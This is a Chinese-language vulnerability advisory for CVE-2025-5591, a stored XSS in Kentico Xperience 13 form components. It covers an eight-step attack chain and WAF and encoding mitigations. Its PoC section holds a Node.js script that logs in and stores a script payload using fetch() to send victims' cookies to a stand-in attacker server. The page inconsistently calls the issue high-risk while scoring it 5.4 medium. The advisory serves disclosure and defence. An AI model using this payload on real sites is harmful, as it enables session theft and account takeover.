CVE-2025-5591: Kentico Xperience 13 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-5591

漏洞类型

存储型跨站脚本攻击(Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Kentico Xperience 13

漏洞概述

CVE-2025-5591是Kentico Xperience 13中的一个高危安全漏洞，属于存储型跨站脚本攻击（Stored Cross-Site Scripting）。该漏洞存在于Kentico Xperience的内容管理表单组件中，攻击者可以通过在表单字段中注入恶意JavaScript代码，当其他用户访问包含该恶意代码的页面时，脚本将在受害者浏览器中执行。攻击者利用此漏洞可以劫持用户会话、窃取敏感信息（如cookies、session tokens）、冒充合法用户执行操作，甚至进一步进行横向移动攻击。由于该漏洞为存储型XSS，恶意代码被永久存储在服务器端，所有访问受影响页面的用户都会受到攻击，影响范围广泛。此漏洞需要低权限认证即可利用，但仍需用户交互才能完成攻击，这使得攻击具有一定的针对性，但仍然构成严重安全风险。

技术细节

该漏洞的根本原因在于Kentico Xperience 13的表单组件对用户输入缺乏充分的输入验证和输出编码。攻击者在表单提交时，可以在特定字段中注入包含恶意JavaScript代码的payload，例如：<script>alert(document.cookie)</script>或更复杂的窃取session的脚本。由于应用程序未对用户输入进行安全过滤，恶意代码被存储在数据库中。当其他用户访问包含该表单数据的页面时，服务器从数据库读取数据并直接嵌入到HTML响应中，浏览器将其作为可执行脚本解析执行。攻击者可以利用此漏洞执行以下操作：1) 通过document.cookie窃取用户会话cookie；2) 使用fetch或XMLHttpRequest将窃取的凭证发送到攻击者控制的服务器；3) 在受害者浏览器上下文中执行任意操作，如修改页面内容、发起请求等。由于该漏洞影响表单组件，通常出现在用户提交内容或填写表单的场景中，攻击面较大。防御措施包括：对所有用户输入实施严格的输入验证，使用白名单机制；输出时对特殊字符进行HTML编码；对cookie设置HttpOnly和Secure属性；实施内容安全策略（CSP）头部。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Kentico Xperience 13版本，并定位存在漏洞的表单组件

STEP 2

步骤2: 账户获取

攻击者通过低权限账户登录Kentico Xperience系统，或利用社工手段获取有效凭证

STEP 3

步骤3: 恶意代码注入

在表单字段中注入包含恶意JavaScript代码的XSS payload，如<script>标签或事件处理器

STEP 4

步骤4: 数据存储

恶意代码被永久存储在数据库中，无需再次注入

STEP 5

步骤5: 等待受害者访问

当其他用户访问包含恶意表单数据的页面时，服务器将恶意代码嵌入HTML响应

STEP 6

步骤6: 脚本执行

受害者浏览器解析页面时执行恶意JavaScript代码

STEP 7

步骤7: 会话劫持

恶意脚本窃取用户cookie或session信息，并发送到攻击者控制的服务器

STEP 8

步骤8: 账户接管

攻击者利用窃取的凭证冒充受害者执行操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-5591 PoC - Stored XSS in Kentico Xperience 13 Form Component
// Author: Security Researcher
// Target: Kentico Xperience 13

const axios = require('axios');

// Configuration
const TARGET_URL = 'https://target-site.com';
const ATTACKER_SERVER = 'https://attacker-controlled.com';
const USERNAME = 'attacker_user';
const PASSWORD = 'password123';

// Malicious XSS Payload
const xssPayload = `<script>
  // Steal session cookies
  fetch('${ATTACKER_SERVER}/log?cookie=' + encodeURIComponent(document.cookie))
    .then(response => response.text())
    .then(data => console.log('Cookie sent'))
    .catch(err => console.error('Error:', err));
</script>`;

async function exploit() {
  try {
    // Step 1: Authenticate to Kentico Xperience
    const loginResponse = await axios.post(`${TARGET_URL}/CMSPages/logon.aspx`, {
      username: USERNAME,
      password: PASSWORD
    }, {
      headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
      }
    });

    const cookies = loginResponse.headers['set-cookie'];
    console.log('[+] Authentication successful');

    // Step 2: Navigate to Form Component
    const formPage = await axios.get(`${TARGET_URL}/CMSModules/WebForms/Controls/Form.aspx`, {
      headers: { Cookie: cookies.join(';') }
    });

    // Step 3: Submit form with XSS payload
    const submitResponse = await axios.post(`${TARGET_URL}/CMSModules/WebForms/Controls/Form.aspx`, {
      'formField_0': xssPayload,
      'btnSubmit': 'Submit'
    }, {
      headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': cookies.join(';')
      }
    });

    console.log('[+] XSS payload submitted successfully');
    console.log('[+] Payload stored in form component');
    console.log('[+] Any user viewing this form will trigger the XSS');

  } catch (error) {
    console.error('[-] Exploitation failed:', error.message);
  }
}

exploit();

影响范围

Kentico Xperience 13 所有版本

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙（WAF）上配置规则，检测和阻止包含<script>标签、javascript:伪协议、事件处理器属性（如onerror、onload）等XSS特征的请求。同时限制低权限用户对表单组件的访问权限，启用审计日志监控异常表单提交行为。对受影响页面实施临时访问控制，限制未授权用户访问包含用户生成内容的表单页面，直至官方补丁发布。